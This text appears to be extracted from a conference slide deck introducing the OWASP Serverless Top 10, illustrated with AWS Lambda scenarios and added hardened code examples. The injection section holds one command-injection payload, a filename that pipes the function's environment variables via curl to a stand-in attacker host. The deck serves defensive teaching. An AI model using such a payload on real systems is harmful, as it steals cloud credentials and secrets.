INTRODUCTION TO OWASP Serverless Top 10
About me
Chandrapal Badshah
Security Enthusiast
Build, Break, Build guy
Would love to talk about plants ;)
Contact:
● twitter.com/@bnchandrapal
● github.com/Chan9390
START WITH WHY
- Simon Sinek
Once upon a time...
(diagram: Database, Web Server, CPU, Memory, Web Application, Static Files)
But ...
(the same diagram, repeated on the next two slides)
Security: maintaining/updating operating system with security patches, WAF/firewall configuration, network monitoring, etc
CHANGED THE GAME
Introduction to Microservices
Still a lot of manual work (depending on the deployment method) to scale it. Security tasks depend on the deployment method too.
Introduction to Serverless
The phrase “serverless” doesn’t mean servers are no longer involved. It simply
means that developers no longer have to think that much about them.
Computing resources get used as services without having to manage around
physical capabilities or limits.
https://readwrite.com/2012/10/15/why-the-future-of-software-and-apps-is-serverless/
Introduction to Serverless
https://martinfowler.com/bliki/Serverless.html
Cloud Providers
Serverless Tools & Frameworks
Who uses Serverless (AWS Lambda)
https://aws.amazon.com/lambda/resources/customer-case-studies/
Features of Function-as-a-Service
➔ Stateless functions
➔ Complete abstraction
➔ Instant, Scalable and event-driven
➔ Pay for what you use
➔ Free trials (AWS lambda gives 1,000,000* lambda triggers for free every month)
➔ There is a default timeout
➔ The function guidelines are defined by the Cloud Service Provider
➔ Multiple Languages supported
DEMO - Deploying Serverless App
So simple right ?
What if … ?
One question ?
Do you think OWASP Serverless Top 10 vulnerabilities are different than OWASP Top 10 ?
● The way the apps are created is similar to that of server based applications
● There’s not a lot of data from organizations on how they use serverless functions in production (and the security issues faced)
Let’s jump into OWASP Serverless Top 10
A1: Injection
● Serverless functions don’t only support HTTP triggers; they also support cloud storage events, database changes, etc
● SQL/NoSQL injection
● OS Command Injection
● Code Injection - the severity depends on the permissions given to the vulnerable lambda function
An example scenario: CV filtering system
● User sends mail with CV attached
● Email reaches the server
● AWS SNS sends notification to Lambda
● Lambda gets the mail, parses it if there’s a PDF attachment
Can you see the bug ?
What the Lambda code does:
● Checks if the file has a file name
● Checks if the filename ends with .pdf
● Builds the path by appending the filename to /tmp
● Executes the command pdftotext on that path
Payload (to print the environment variables)
foobar;env|curl -H "Content-Type: text/plain" -X POST -d @- http://attacker.site/collector #.pdf
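The CV-filtering handler above, as an added example that is not the deck's own code: the vulnerable pattern (filename trusted, appended to /tmp, handed to a shell) next to a hardened version that validates the name and runs pdftotext without a shell. The function names, the `attachment` field and the SNS-style event shape are assumptions made for the illustration.

```python
"""Added example, not code from the deck: the CV-filtering Lambda the slides
describe (filename check, /tmp path, pdftotext) shown as the vulnerable
shell-string pattern next to a hardened version.  The handler names, the
`attachment` field and the SNS-style event are assumptions for illustration."""
import os
import re
import subprocess

# --- Vulnerable pattern (what the deck's slide walks through) ---------------
# The attachment name is trusted, appended to /tmp and handed to a shell.
# Everything after a ';' or '|' in the name becomes a separate command.
def build_command_vulnerable(filename: str) -> str:
    if not filename or not filename.endswith(".pdf"):
        raise ValueError("not a pdf")
    return "pdftotext /tmp/" + filename + " -"   # would be run with shell=True

# --- Hardened version -------------------------------------------------------
# Only a plain basename of letters, digits, dot, underscore, dash ending in .pdf.
SAFE_NAME = re.compile(r"[A-Za-z0-9_-][A-Za-z0-9._-]{0,99}\.pdf")

def safe_attachment_path(filename: str) -> str:
    """Return /tmp/<name> or raise ValueError; never trust the mail client's name."""
    if not isinstance(filename, str) or os.path.basename(filename) != filename:
        raise ValueError(f"rejected attachment name: {filename!r}")   # path separators / traversal
    if not SAFE_NAME.fullmatch(filename):
        raise ValueError(f"rejected attachment name: {filename!r}")   # metacharacters, spaces, leading dot
    return os.path.join("/tmp", filename)

def pdftotext_argv(filename: str) -> list:
    """argv list: the filename is a single argument, never re-parsed by a shell."""
    return ["pdftotext", safe_attachment_path(filename), "-"]

def run_pdftotext(filename: str, timeout: int = 10) -> str:
    """Execute pdftotext without a shell, with a timeout and a minimal
    environment so the function's own secrets (os.environ) are not inherited."""
    proc = subprocess.run(pdftotext_argv(filename), capture_output=True, check=True,
                          timeout=timeout, env={"PATH": "/usr/bin:/bin"})
    return proc.stdout.decode("utf-8", "replace")

def lambda_handler(event, context=None):
    """Validate every attachment name in an SNS-style event (constructed shape)
    and report which would be processed; pdftotext itself is not invoked here."""
    results = []
    for record in event.get("Records", []):
        name = record.get("attachment")          # assumed field from the mail parser
        try:
            results.append({"attachment": name, "argv": pdftotext_argv(name)})
        except ValueError as exc:
            results.append({"attachment": name, "rejected": str(exc)})
    return results

if __name__ == "__main__":
    # Constructed event: one benign CV and one name carrying shell metacharacters.
    event = {"Records": [{"attachment": "jane-doe-cv.pdf"},
                         {"attachment": "foobar;env #.pdf"}]}
    for r in lambda_handler(event):
        print(r)
```

The allow-list is deliberately stricter than "ends with .pdf": the vulnerable check is satisfied by any string whose last four characters are `.pdf`, so a trailing ` #.pdf` turns the rest of the name into a shell comment. Passing an argv list removes the shell from the path entirely; the name check is still kept so that traversal and odd characters never reach the filesystem.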
A2: Broken Authentication
● Functions are Stateless
● Multiple entry points, services, events and triggers and no continuous flow - things can get worse
● Common example: the functions for internal use only are available to all
A3: Sensitive Data Exposure
● Depends on the architecture just like other server based applications
● Common example: having functions disclosing logs in some specific endpoint
A bug I recently found
A4: XML External Entity
● Insecure way of parsing XML files by the serverless function
● The exploitability may not always be fruitful
Vulnerable code … (downloads the XML file from the bucket and parses it)
The Payload ...
The result…
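An added example (not the deck's code) of the "download the XML file from the bucket and parse it" step hardened against XXE: any DOCTYPE is rejected before the document reaches the parser, since entities, external ones included, can only be declared there. `parse_cv`, the `<cv>` element names and the in-memory stand-in for the bucket are assumptions for the illustration.

```python
"""Added example, not the deck's code: the "download the XML file from the
bucket and parse it" step hardened against XXE by refusing any DOCTYPE before
the document reaches the parser.  `parse_cv`, the element names and the
in-memory "bucket" are assumptions for illustration."""
import xml.etree.ElementTree as ET
import xml.parsers.expat

class DoctypeRejected(ValueError):
    """Raised when the XML carries a DOCTYPE (and therefore could declare entities)."""

def assert_no_doctype(xml_bytes: bytes) -> None:
    """Scan with expat and abort on the first DOCTYPE declaration.  Entities,
    including external ones, can only be declared inside a DOCTYPE, so rejecting
    it removes the XXE surface regardless of the parser used afterwards."""
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise DoctypeRejected(f"DOCTYPE {name!r} is not allowed in uploaded XML")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.Parse(xml_bytes, True)          # raises ExpatError on malformed XML

def parse_cv(xml_bytes: bytes) -> dict:
    """Parse a <cv> document into {tag: text} after the DOCTYPE check."""
    assert_no_doctype(xml_bytes)
    root = ET.fromstring(xml_bytes)
    if root.tag != "cv":
        raise ValueError(f"unexpected root element {root.tag!r}")
    return {child.tag: (child.text or "").strip() for child in root}

# Constructed stand-in for the S3 bucket the deck mentions: key -> bytes.
FAKE_BUCKET = {
    "uploads/ada.xml": b"<cv><name>Ada</name><role>engineer</role></cv>",
    "uploads/bad.xml": (b'<!DOCTYPE cv [<!ENTITY e "expanded">]>'
                        b"<cv><name>&e;</name></cv>"),
}

def handle_object(key: str, bucket=FAKE_BUCKET) -> dict:
    """Fetch the object (here from the in-memory dict) and parse it; return either
    the parsed fields or a rejection reason so the caller can log it."""
    try:
        return {"key": key, "fields": parse_cv(bucket[key])}
    except DoctypeRejected as exc:
        return {"key": key, "rejected": str(exc)}

if __name__ == "__main__":
    for key in FAKE_BUCKET:
        print(handle_object(key))
```

Rejecting the DOCTYPE outright is simpler to reason about than toggling per-parser entity options, and it applies the same way whichever XML library the function ends up using; the rejection reason is returned rather than swallowed so it can be logged (see A10).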
A5: Broken Access Control
● Functions with over privileges
● If functions are allowed to access anything on the cloud account, then so is an attacker who exploits some vulnerability like code execution
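An added example (not the deck's code) of checking for the over-privileged execution role this slide warns about: a small scan over two constructed IAM policies, one that grants everything and one scoped to what the CV-parsing function needs. The bucket name, account id and function name are placeholders.

```python
"""Added example, not the deck's code: a small check for the over-privileged
execution role the A5 slide warns about, run over two constructed IAM policies.
The bucket name, account id and function name are placeholders."""

def _as_list(value):
    # IAM allows a single string or a list for Statement, Action and Resource.
    return value if isinstance(value, list) else [value]

def find_over_privileges(policy: dict) -> list:
    """Return (statement index, kind, value) for every Allow statement that grants
    a wildcard action ('*' or 'service:*') or applies to Resource '*'."""
    findings = []
    for i, stmt in enumerate(_as_list(policy.get("Statement", []))):
        if stmt.get("Effect") != "Allow":
            continue
        for action in _as_list(stmt.get("Action", [])):
            if action == "*" or action.endswith(":*"):
                findings.append((i, "wildcard-action", action))
        for resource in _as_list(stmt.get("Resource", [])):
            if resource == "*":
                findings.append((i, "wildcard-resource", resource))
    return findings

def policy_is_scoped(policy: dict) -> bool:
    return not find_over_privileges(policy)

# Constructed: the kind of role that turns "code execution in the function"
# into "access to the whole account".
OVER_PRIVILEGED = {
    "Version": "2012-10-17",
    "Statement": [{"Effect": "Allow", "Action": "*", "Resource": "*"}],
}

# Constructed: least-privilege role for the CV-parsing function: read one
# bucket prefix, write its own log group, nothing else (placeholder ARNs).
LEAST_PRIVILEGE = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow",
         "Action": ["s3:GetObject"],
         "Resource": "arn:aws:s3:::example-cv-bucket/uploads/*"},
        {"Effect": "Allow",
         "Action": ["logs:CreateLogStream", "logs:PutLogEvents"],
         "Resource": "arn:aws:logs:us-east-1:123456789012:log-group:/aws/lambda/cv-parser:*"},
    ],
}

if __name__ == "__main__":
    for name, pol in (("over-privileged", OVER_PRIVILEGED),
                      ("least-privilege", LEAST_PRIVILEGE)):
        print(name, find_over_privileges(pol))
```

The check is intentionally coarse: it flags the two patterns that most often appear in quickly written execution roles. A real review would also look at resource patterns narrower than `*` but still broad (a whole service, all buckets) and at what the function's triggers let it reach.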
A6: Security Misconfiguration
● Not just the function but how the function interacts with the environment
● Because of the complexity which is introduced due to increased features/functions, it’s very easy for security misconfiguration
● Can lead to DoS/timeouts
● Example: Public S3 buckets
A7: Cross Site Scripting (XSS)
● Most common bug affects serverless functions as well
● Mostly due to lack of user input sanitization
Find the bug… (scenario)
● User sends mail
● Email reaches the server
● AWS SNS sends notification to Lambda
● Lambda gets the mail, parses it and sends the message content to the moderator dashboard
Find the bug…
What the Lambda code does:
● Gets the message content
● Sends the message content to the dashboard
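The dashboard step above, as an added example that is not the deck's code: the unescaped rendering the slide asks you to spot, next to an escaped version and the response headers that back it up. The message shape, the function names and the header values are assumptions for the illustration.

```python
"""Added example, not the deck's code: the moderator-dashboard step from the
A7 scenario, with the unescaped rendering the slides call out beside an
escaped version.  The message shape and the header values are assumptions."""
import html

def render_message_vulnerable(sender: str, body: str) -> str:
    """Mail content dropped straight into HTML: any tag in the mail body is
    rendered, and therefore executed, in the moderator's browser."""
    return f"<li><b>{sender}</b>: {body}</li>"

def render_message(sender: str, body: str) -> str:
    """Escape every untrusted value for the HTML text context."""
    return f"<li><b>{html.escape(sender)}</b>: {html.escape(body)}</li>"

def dashboard_response(messages: list) -> dict:
    """API Gateway-style response; the CSP is a second layer in case another
    template in the dashboard forgets to escape."""
    items = "".join(render_message(m["sender"], m["body"]) for m in messages)
    return {
        "statusCode": 200,
        "headers": {
            "Content-Type": "text/html; charset=utf-8",
            "Content-Security-Policy": "default-src 'none'; style-src 'self'",
            "X-Content-Type-Options": "nosniff",
        },
        "body": f"<ul>{items}</ul>",
    }

# Constructed messages: one normal, one carrying markup in the body.
SAMPLE_MESSAGES = [
    {"sender": "alice@example.com", "body": "Please review my application."},
    {"sender": "mallory@example.com", "body": "<script>x</script>"},
]

if __name__ == "__main__":
    print(render_message_vulnerable(**SAMPLE_MESSAGES[1]))   # tag survives intact
    print(dashboard_response(SAMPLE_MESSAGES)["body"])        # tag is escaped
```

Escaping happens at the point of output, in the context the value lands in (HTML text here); a value that later goes into an attribute, a URL or a script block needs the encoding for that context instead, which is why the CSP header is kept as a safety net rather than relied on alone.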
A8: Insecure Deserialization
● Common in Python and NodeJS, but also affects Java and dotNET
● Mostly introduced due to insecure use of 3rd party libraries
Example Java payload
The payload in request…
And the result…
A9: Using components with known vulnerabilities
● Using dependencies which are insecure
● Most commonly found
● Not every vulnerability will affect serverless functions
● Doesn’t always guarantee you remote exploitation
A10: Insufficient Logging and Monitoring
● Serverless auditing is even more difficult than traditional web applications
● Since the client interacts directly with the serverless functions there is no place for implementing WAFs or any active monitoring systems
● This actually helps attackers
Lambda code
Lambda logs
Lambda Logs (in case of huge payload)
Resources
OWASP Serverless Top 10: https://www.owasp.org/index.php/OWASP_Serverless_Top_10_Project
OWASP Serverless Top 10 GitHub repo: https://github.com/OWASP/Serverless-Top-10-Project
Serverless Security - Function-as-a-Service: https://www.youtube.com/watch?v=c5ZHPc_yG4g
Securing Serverless Applications Step-by-step: https://www.youtube.com/watch?v=B3j4xql7we0
AWS Serverless Functions: https://github.com/aws-samples/aws-serverless-workshops
PureSec Serverless Top 10: https://github.com/puresec/sas-top-10
Stay tuned !
Damn Vulnerable Serverless App on its way
Any Questions ?
Speaker notes
1. The control was with the server. (Give example, cookie is still serverside in serverless)